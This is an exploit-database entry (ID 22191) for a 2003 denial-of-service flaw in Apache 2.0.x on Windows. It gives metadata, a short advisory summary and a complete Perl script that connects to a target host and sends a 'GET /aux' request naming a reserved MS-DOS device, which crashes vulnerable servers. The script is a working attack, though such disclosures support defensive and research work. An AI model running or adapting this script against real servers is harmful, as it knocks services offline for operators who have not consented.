EXPLOITS

Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service

Author: Matthew Murphy
type: dos
platform: linux
port: 
date_added: 2003-01-22  
date_updated: 2012-10-23  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22191.pl  

source: https://www.securityfocus.com/bid/6662/info

A vulnerability has been reported in Apache Web server for Microsoft Windows. The vulnerability exists in the way some HTTP requests are handled by the Apache Web server. Specifically, HTTP GET requests that involve reserved MS-DOS device names may cause the Apache Web server to crash.

#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
	print STDOUT "Usage: perl $0 <host> <port=80>";
	exit;
}
if (@ARGV == 2) {
	$port = $ARGV[1];
} else {
	$port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";